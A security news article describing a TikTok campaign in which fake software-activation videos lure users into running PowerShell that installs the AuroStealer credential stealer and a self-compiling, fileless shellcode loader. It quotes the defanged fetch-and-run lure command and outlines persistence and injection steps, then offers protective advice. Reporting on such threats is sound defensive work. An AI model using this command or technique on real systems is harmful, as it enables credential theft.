Cybercriminals are increasingly leveraging TikTok’s vast user base to disseminate sophisticated malware campaigns. By masquerading as tutorials for free software activation, these malicious actors deceive users into executing harmful PowerShell commands, leading to the installation of self-compiling malware on their systems.
The Deceptive Strategy
The attack begins with TikTok videos that appear to offer free activation methods for popular software applications, such as Adobe Photoshop. One such video garnered over 500 likes before being identified and removed. These videos instruct viewers to open PowerShell with administrative privileges and input a specific command.
For instance, users are directed to execute:
“`powershell
iex (irm slmgr[.]win/photoshop)
“`
This command fetches and runs malicious PowerShell code from a remote server, initiating the infection process.
Infection Process and Payloads
Upon execution, the initial script downloads a secondary executable named `updater.exe` from a specified URL. Analysis reveals that this file is the AuroStealer malware, designed to harvest sensitive credentials and system information from the infected device.
To maintain persistence, the malware creates scheduled tasks that mimic legitimate system processes. These tasks are randomly named to resemble genuine Windows services, ensuring the malware executes at every user logon without raising suspicion.
Advanced Evasion Techniques
A notable aspect of this campaign is the use of a third payload, `source.exe`, which introduces an advanced evasion technique. This component compiles C# code on-the-fly during runtime using the .NET Framework compiler located at:
“`
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
“`
This self-compiling capability allows the malware to dynamically generate code that imports functions from `kernel32.dll`, such as `VirtualAlloc`, `CreateThread`, and `WaitForSingleObject`. The dynamically compiled code allocates executable memory space, injects shellcode directly into the process memory, and creates a new thread to execute the malicious payload. This method enables the malware to operate without writing additional files to disk, effectively evading traditional detection mechanisms.
Broader Implications
Researchers have identified multiple variations of this campaign across TikTok, targeting users searching for cracked versions of various software applications. This trend underscores the importance of exercising caution when downloading software from untrusted sources.
Protective Measures
To safeguard against such threats, users are advised to:
– Avoid Untrusted Sources: Refrain from downloading software or activation methods from unofficial channels or unverified sources.
– Be Skeptical of Free Offers: Exercise caution with offers that seem too good to be true, such as free activations of premium software.
– Keep Software Updated: Regularly update operating systems and software applications to patch known vulnerabilities.
– Use Reputable Security Solutions: Employ reliable antivirus and anti-malware programs to detect and prevent potential threats.
– Educate Yourself: Stay informed about common social engineering tactics and malware distribution methods to recognize and avoid potential threats.
By remaining vigilant and adhering to these best practices, users can significantly reduce the risk of falling victim to such sophisticated cyber threats.
